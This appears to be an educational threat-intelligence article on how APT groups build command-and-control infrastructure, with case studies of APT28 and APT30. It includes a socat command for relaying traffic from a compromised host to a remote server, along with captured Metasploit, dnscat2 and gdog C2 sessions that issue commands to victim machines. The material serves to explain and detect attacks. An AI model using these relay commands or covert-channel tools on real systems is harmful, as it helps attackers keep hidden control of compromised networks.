# [Stages of APT]COMMAND AND CONTROL

During the APT campaign adversaries need to maintain active connections with the compromised infrastructure. While the initial malware plays an important role, it’s important for the attackers to establish a Command and Control (C&C) infrastructure in order to interact with the infected host. C&C provides means of upgrading the malware, performing further attacks and facilitates during the data exfiltration stage. Therefore, attackers make sure that the C&C is stealth, not blocked by the target’s network monitoring systems and is resilient to takedowns [1].

Depending on the adversary’s tactics the C&C might be as simple as a single server operating on the external network or a very sophisticated infrastructure involving a chain of servers, in some cases even legitimate cloud based infrastructures which are abused via techniques such as stenography, covert communications, etc. [2] C&C can also be established within the compromised network [3].  This allows the attackers to keep minimal traces on the target’s egress network making it more difficult to detect the breach.

The way infrastructure is established depends on the resources the APT group poses. In some cases, the infrastructure is kept simple due to lack of financial resources or low priority of the campaign. It might also be a sign of poor skills of the threat actor. A very sophisticated C&C is usually used by skilled and well sponsored APT groups who want to keep their campaign very stealth for a long time. In any case, C&C is a crucial part of the attack carried out by these adversaries.

Command and Control Techniques

While there are various concepts of C&C servers, the main concern for APT attackers is to make the communications between the malware and the C&C server stealthy so that it’s not detected by the target. In order to accomplish this attackers apply various techniques which make it difficult to track the location and communications between the malware and these servers.

Spoofing legitimate looking domain names

One of the most common techniques used for establishing C&C servers is the usage of domain names which match a pattern of legitimate software or e-mail services, mimic common naming of online advertisement services or sites that are relevant to a current campaign. The main reason of using these techniques is to make sure that the malicious traffic blends into a regular one. Here are some examples:

Hiding C&C location

A known technique for hiding C&C location is the usage of dynamic DNS services such as NoIP, DynDNS and others [4]. This kind of services provides anonymity for attackers as no legitimate contact details are needed in order to register domain names via these services. Additionally, domain name and IP mappings can be quickly changed in case the initial IP gets blocked on the target’s infrastructure. This is possible due to short caching (TTL) values associated with such domains.

C&C via Proxies

In order to increase stealth and availability of C&C servers, APT groups commonly use intermediate servers (also known as proxies). These servers serve as a proxy without exposing the real destination of the Command and Control server [5]. Therefore, in case of one server’s take-down, the communication between malware and C&C is restored over another chain. An example of such a C&C implementation is show in Figure 1.

Figure 1: An example of proxyfied APT infrastructure

The easiest implementation of such a concept requires a single tool capable redirecting network traffic. Best examples of such tools are socat and netcat. These tools are widely spread across Unix systems and can be easily abused on compromised machines. In order to create a simple port redirect it is sufficient to execute the following command line on a controlled system.

socat TCP-LISTEN:80,fork TCP:1.2.3.4:443

The above command redirects incoming connections on port 80 to a port 443 on a remote system having IP address 1.2.3.4. This technique allows not only to redirect traffic between the proxy chain, but also allows to redirect traffic of communications which otherwise would be blocked by the target’s firewall. An example of such a case is redirecting SMTP or FTP communication over 80 or 443 ports which then is bounced to the actual server’s ports 25 (for SMTP) or 21 (for FTP).

Covert channel – HTTP/HTTPS

In order to mask communications crossing the target’s network perimeter APT groups often implement covert channels. These channels are often encrypted in order to hide the contents of the communications. While there are many ways to establish malicious C&C channels, ports 80 and 443 are usually used due to the fact that only these ports are allowed for outgoing connections in properly secured corporate environments or governmental institutions [6].

Depending on the actual C&C and malware implementation, the communication which is being transmitted over HTTP/HTTPS ports can be a legit HTTP protocol or a binary communication. Additionally, malware might be connecting via proxies in order to mask the real location of the C&C server. An example of such a setup is shown in Figure 2.

Figure 2: Covert C&C channels over ports 80 and 443

Once the communication is established, commands can be passed interactively or semi-interactively. In the first case a direct communication channel is established between the C&C server and the infected host. Once the channel is open, commands and results are transferred through the channel. A semi-interactive approach relies on attackers pushing commands to the C&C server and victim’s host contacting the C&C on a regular basis to check out for new commands. A real case communication of the later example generated by Metasploit’s HTTP agent is shown below. While the white color in the example represents the victim’s traffic asking for commands and submitting results, the red one indicates C&C responses with a task to perform directory listing (via command “dir”) on the current path.

POST /v74kmNBxLOM-cT9waeaLGQqPQ_dRDmB/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Length: 4

RECV

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: Keep-Alive
Server: Apache
Content-Length: 112

...p............core_channel_write....)....04785963232622251105113685466269........2...........4**dir**
............

POST /v74kmNBxLOM-cT9waeaLGQqPQ_dRDmB/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Length: 1697

................core_channel_write........2.......>...4dir
Volume in drive C is Windows8_OS
Volume Serial Number is 6217-258A

Directory of C:\windows\system32\WindowsPowerShell\v1.0

2013-06-18  15:25            27,338 Certificate.format.ps1xml
2013-06-18  15:25            27,106 Diagnostics.Format.ps1xml
2013-06-18  15:25           147,702 DotNetTypes.format.ps1xml
2013-06-18  15:25            14,502 Event.Format.ps1xml
2013-08-22  18:36              Examples
2013-06-18  15:25            21,293 FileSystem.format.ps1xml
2013-06-18  15:26            15,603 getevent.types.ps1xml

...

In order to provide a clear example of the communications, the encryption of the protocol was intentionally disabled. However, it is very common that transport layer (SSL/TLS) encryption is used by the malware of APT actors in order to mask their activities. Moreover, it’s also common to see additional application level encryption of the payloads which makes it very difficult to inspect the network traffic between C&Cs and malware.

Covert channel – DNS

In addition to HTTP protocols, DNS is also known to be adapted by APTs as a covert channel [7]. In this case, attackers register a malicious domain and point it to their C&C server. A special software is used on this server which mimics a DNS server, but embeds malicious commands in the response packets. Malware on the infected system interprets the malicious DNS response and executes given command. Once the command is executed, the result might be returned back to the C&C in a similar manner. An example of such an infrastructure is show in Figure 3.

Figure 3: DNS used as a covert C&C channel

A real case proof of concept example can be provided by using a tool called dnscat2. This tool allows transmitting Command and Control messages encapsulated in DNS queries. Once the malware is executed on the victim’s machine it calls out to a C&C domain which in turn responds with a specially crafted DNS reply containing further instructions. The following figure shows network traffic of a communication between an infected machine and a C&C server where dnscat2 software is running.

Figure 4: Network traffic generated by dnscat2

The highlighted packet caries a command which was issued by the C&C. In this case, the command is encoded via hexadecimal characters and can be decoded as shown below.

dnscat.b21c0152b7b1d1506d0000001600020002**63616c632e657865**00**63616c632e657865**00
...                                      c a l c . e x e   c a l c . e x e

Due to specifics of the tool, the command string appears twice in the payload. The reason for this is the fact that the first occurrence is later used an identifier of the created thread and the second occurrence is the actual command which gets executed. Moreover, this tool supports encryption for commands which are sent to the infected host and therefore makes this kind of communication analysis very difficult. An example of encrypted communications which execute the same command is show in Figure 5.

Figure 5: Encrypted communications of dnscat2

Here’s an example of using an e-mail server as a means of Command and Control. In this case a pre-configured e-mail account is used by attackers to submit commands. An infected machine constantly logs into this e-mail account to check for new tasks. Once a task is found, malware executes the command and returns the response in a form of an email text or attachment.

Figure 6: Covert C&C channel over e-mail

Covert channel – Gmail

Using a tool called gdog it is possible to mimic such a C&C infrastructure. This tool uses a pre-configured Gmail account for exchanging commands and files which are sent to or downloaded from the infected machine. Every infected host and task is identified by an ID which is used in e-mail’s Subject field. Upon the execution of the malware on the victim’s machine an initial Check-In e-mail is sent with basic information and a unique identifier of the infected host. Later, the following set of commands (marked in red) are being executed from attacker’s computer.

[email protected]:/opt/gdog# **python gdog.py -list**
f51779b9c... Windows-7-6.1.7601-SP1
[email protected]:/opt/gdog# **python gdog.py -id f51779b9c... -cmd ver**
[*] Command sent successfully with jobid: 599cf0f1d...
[email protected]:/opt/gdog# **python gdog.py -id f51779b9c... -jobid 599cf0f1d...**
DATE: 'Tue, 26 Jul 2016 13:43:38 -0700 (PDT)'
JOBID: 599cf0f1d...
CMD: 'ver'

'
Microsoft Windows [Version 6.1.7601]
'
[email protected]:/opt/gdog# **python gdog.py -id f51779b9c... -cmd "dir c:\\"**
[*] Command sent successfully with jobid: 611fc9e766...
[email protected]:/opt/gdog# **python gdog.py -id f51779b9c... -jobid 611fc9e766...**
DATE: 'Tue, 26 Jul 2016 13:51:43 -0700 (PDT)'
JOBID: 611fc9e766...
CMD: 'dir c:\'

' Volume in drive C has no label.
Volume Serial Number is 404C-AEF2

Directory of c:\

04/12/2016  11:50 AM             Applications
07/21/2016  01:44 PM             Program Files
07/21/2016  01:44 PM             Program Files (x86)
07/25/2016  03:51 PM              Python27
12/07/2015  05:33 PM             Users
07/21/2016  01:38 PM             Windows
05/23/2016  02:45 PM              xampp
0 File(s)              0 bytes
10 Dir(s)  10,078,973,952 bytes free

In order to protect sensitive data in case of the e-mail account’s compromise, the tool encrypts all information which is being transmitted via the e-mails. The following screenshots show a check-in (“Subject: hereiam”), attacker’s commands (“Subject: gdog”) and result returned by the victim’s machine (“Subject: dmp”). Moreover, the Check-In e-mail is shown in Figure 8 in order to verify that the system information is being encrypted.

Figure 7: Excerpt of e-mails generated by gdog

Figure 8: Actual contents of an encrypted e-mail

The presented concepts of the C&C implementations are the most common. In a real world, attackers might chain these concepts or apply various modifications. Nevertheless, in most cases a central point of command distribution must exist in order to efficiently control the infected machines while executing campaign. The implementation of the C&C infrastructure depends on the APT group and the specifics of the campaign.

Real World Example: APT28 / Sofacy

After successful initial exploitation of the victim through a web browser exploit, social engineering with a Firefox add-on or a malicious attachment, the first-stage component of APT28’s malware gets written to the disk. This component is a first-stage dropper and its main purpose is to drop a file and execute it in order to contact the C&C server and ask for further instructions. The dropped file is a downloader that contacts the C&C server to receive the second stage component. After that, the second stage dropper installs the second stage backdoor.

For concealing the information being transmitted to an HTTP based C&C, APT28 employs encryption and encoding as means of obfuscation. Known techniques used by this group include RC4 or XOR encryption of the initial data and further encoding with modified Base64 encoding which is meant to prevent investigators from easily deciphering the data [8]. Another technique used by APT28 is the transmission of C&C commands over SMTP. For this purpose one of the malware components used by the group had e-mail accounts hard-coded within the binary for sending and receiving control data. The information being transmitted over such a communication was obfuscated with XOR encryption [9]. In order to hide true origin of the C&C in some cases this group implemented proxies for communications between malware and C&C. For example, during the campaign against Georgian Ministry of Internal Affairs, the communication with command and control server was relayed via an internal mail server [8].  In another case, an external email server was used as a proxy [9].

Finally, for breaching air-gapped networks, a USB stealer was identified to be used by APT28. The purpose of this module was to infect removable drives in order to spread to systems which had no direct connectivity to the internet. Once such a system was infected, the same USB drive was used to exfiltrate data and receive further commands [10].

Configuration file

The second stage backdoor is installed using a dropper which writes the backdoor and the C&C configuration information to a registry location or to an encrypted file. The following table shows the C&C configuration locations used by APT28 [11].

The configuration file (msd) contains essential information for contacting the C&C server: a list of three servers that the backdoor will contact, the interval between requests and a flag which indicates whether key-logging should be activated or not. Based on the compile time, FireEye identified that the group started to apply changes to their SOURFACE downloader. Until 2013, APT28 used hard-coded IP addresses for the C&C communication in their SOURFACE downloader. Later, the location of C&C addresses was changed to hard-coded domains. Additionally, the name of the downloader binary was changed to coreshell.dll and the hostname, volume serial number and OS version data became encoded in the malware’s network communications [8]. The domains used for the C&C communication are designed to avoid attracting attention in a network traffic examination [11]. The domains used for this purpose are typically suggestive of software update services, for example – softupdates.info. This behavior aligns with the previously observed tactic of integrating legitimate company references into their infrastructure naming convention [12].

SOURFACE/CORESHELL C&C Communication

First, the downloader sends a beacon that contains the process listing of the compromised host to its C&C server. After that it downloads and executes the second-stage payloads from C&C. Communication between the downloader and C&C is carried out by using HTTP POST requests with encrypted and Base64 encoded data in the request body. The data is encrypted with a custom stream cipher algorithm using a six-byte key. However, the commands sent from the C&C server to the Downloader implant are encrypted using another stream cipher with an eight-byte key [8].

CHOPSTICK C&C Communication

The backdoor begins communicating with one of its C&C servers by first testing its connectivity with an initial HTTP GET request. Then it starts uploading file contents of the hidden temp-file created to store the collected host information to the C&C server using HTTP POST requests. After uploading the file, it continues HTTP GET requests to query its C&C for further instructions. In order to protect data from interception, the payload sent to C&C by CHOPSTICK is usually encrypted with RC4 before initiating connection [8].

Real World Example: APT30

The command and control infrastructure used by APT30 consists of two main components: the first and the second stage C&C servers. The purpose of the first stage server, which is hard-coded in the initial backdoor, is to collect data from the infected host, provide means of updating the backdoor and orchestrate an interactive channel to the second stage server on demand. While earlier variants of the backdoor communicated over clear text channels, the successors were improved to apply a custom XOR or RC4 encryption which is meant to obfuscate transmitted data [13].

NETEAGLE variants of APT30’s backdoor try to detect if the infected host is configured to use a proxy for communications over internet. If detected, initial communication between the infected host and the C&C server is carried out through HTTP protocol. In case the proxy configuration is missing, UDP protocol is used for communications [13]. A fallback to HTTP communication in case of proxy’s presence is mainly used for bypassing network restrictions.

Finally, certain variants of BACKSPACE backdoor contain a feature to relay C&C traffic to systems which do not have direct access to the internet. An example of such a case is the BACKSPACE ZJ variant. The ZJ-Listen component is designed to listen for incoming commands on ports 21, 80 and 443. Therefore, instead of calling back to the real C&C server, commands for a host infected with ZJ-Listen malware are delivered by another component called ZJ-Link. The later usually has direct internet connectivity and therefore is able to receive commands from the real C&C server which are meant for ZJ-Listen infected host allowing the threat actor to control such a system [13].

For a better understanding of C&C infrastructure used by APT30 the inner workings are described. The first stage location is usually hard-coded in the initial malware. In order to introduce a layer of obfuscation between threat actor and their victims, interaction with the first stage C&C server is fully automated and does not support any interactive communications between actor and victim. To interact with the first stage C&C server, the backdoors BACKSPACE and NETEAGLE use HTTP to request URLs for downloading different files containing basic instructions, information such as second stage C&C locations, or execute additional files. Full URLs have the following format: http:////.

The following table shows example URLs used for BACKSPACE’s first stage C&C server communications.

To decrease the risk of exposing the second stage C&C server, BACKSPACE clients (victim hosts infected with BACKSPACE backdoor) do not establish interactive connections to the controller by default, and instead manage the communication with the second stage server via two files (dizhi.gif and connect.gif) hosted on the first stage server. The threat actor can establish remote control of victim’s host by uploading a notification file to the first stage C&C server. The notification file is called connect.gif and contains the hostname and host ID number of the victim. The victim hosts will then retrieve and parse the connect.gif file and only connect to the controller after verifying that their hostname and host ID is present in the file. In that case, the victim host will connect to the BACKSPACE controller using the data from dizhi.gif. A summarized overview of the communication steps is provided in Table 3.

In order to control the BACKSPACE Backdoor, APT30 uses a well-developed and full-featured GUI tool as their controller software which may have been originally developed as early as in 2004. This controller software (see Figure 9) provides information about the victim host that is connected to the controller, such as hostname, internal and external IP address, system uptime and OS version language, and menu items for “System, “Network”, “File”, “Remote”, and “Attack” operations. Developers of this controller software intended to limit its distribution by implementing a hard disk serial number checks. In order to verify that the controller software is running on an allowed system, the controller compares the local host’s hard disk serial number with 45 pre-defined serial numbers which are hard-coded within the software binary. The execution continues only if the comparison results in a match. This indicates that the controller was developed only for their own use [13].

Figure 9: BACKSPACE GUI

References

1. Joseph Gardiner, M. C. (2014). Command & Control, Understanding, Denying and Detecting. University of Birmingham.
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

2. Fireeye Threat Intelligence. (2015). Hammertoss: Stealthy Tactics Define a Russian Threat Group.
https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf

3. David Sancho, J. d. (2012). IXESHE – An APT Campaign.
https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_ixeshe.pdf

4. Saranya N., M. G. (2016). Prediction of Advanced Persistent Threat Malware on Network Traffic. International Journal of Advanced Engineering and Recent Technology.
http://ijaeart.com/apr2016/p10.pdf

5. Symantec. (2011). W32.Duqu – The precursor to the next Stuxnet.
https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

6. Lawrence Pingree, N. M. (2012). Best Practices for Mitigating Advanced Persistent Threats. Gartner, Inc.
http://apac.trendmicro.com/cloud-content/apac/pdfs/solutions/enterprise/best_practices_for_mitigating_apts_224682.pdf

7. Shelmire, A. (2015, July 6).

8. FireEye, Inc. (2014). APT28: A Window int Russia’s Cyber Espionage Operations?
https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf

9. Joan Calvet, J. C. (2016, June).

10. Calvet, J. (2014, November 11).
https://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/

11. Microsoft Corporation. (2015). Microsoft Security Intelligence Report Volume 19.